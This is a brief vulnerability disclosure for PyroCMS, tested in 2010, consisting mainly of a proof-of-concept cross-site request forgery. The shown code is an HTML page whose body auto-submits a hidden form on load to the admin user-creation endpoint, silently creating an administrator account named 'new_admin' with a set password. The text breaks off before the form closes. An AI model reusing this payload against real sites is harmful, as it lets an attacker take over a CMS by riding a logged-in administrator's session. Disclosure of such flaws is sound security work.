Software Vulnerability Tested On Date
PyroCMS Cross-site Request Forgery Windows Vista + XAMPP 7/7/2010
A vulnerability in PyroCMS can be exploited to create a new admin.
Proof of Concept
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
            <input type="hidden" name="first_name" value="a" />
            <input type="hidden" name="last_name" value="a" />
            <input type="hidden" name="email" value="" />
            <input type="hidden" name="username" value="new_admin" />
            <input type="hidden" name="display_name" value="a" />
            <input type="hidden" name="group" value="admin" />
            <input type="hidden" name="active" value="1" />
            <input type="hidden" name="password" value="Password1" />
            <input type="hidden" name="confirm_password" value="Password1" />
            <input type="hidden" name="btnAction" value="save" />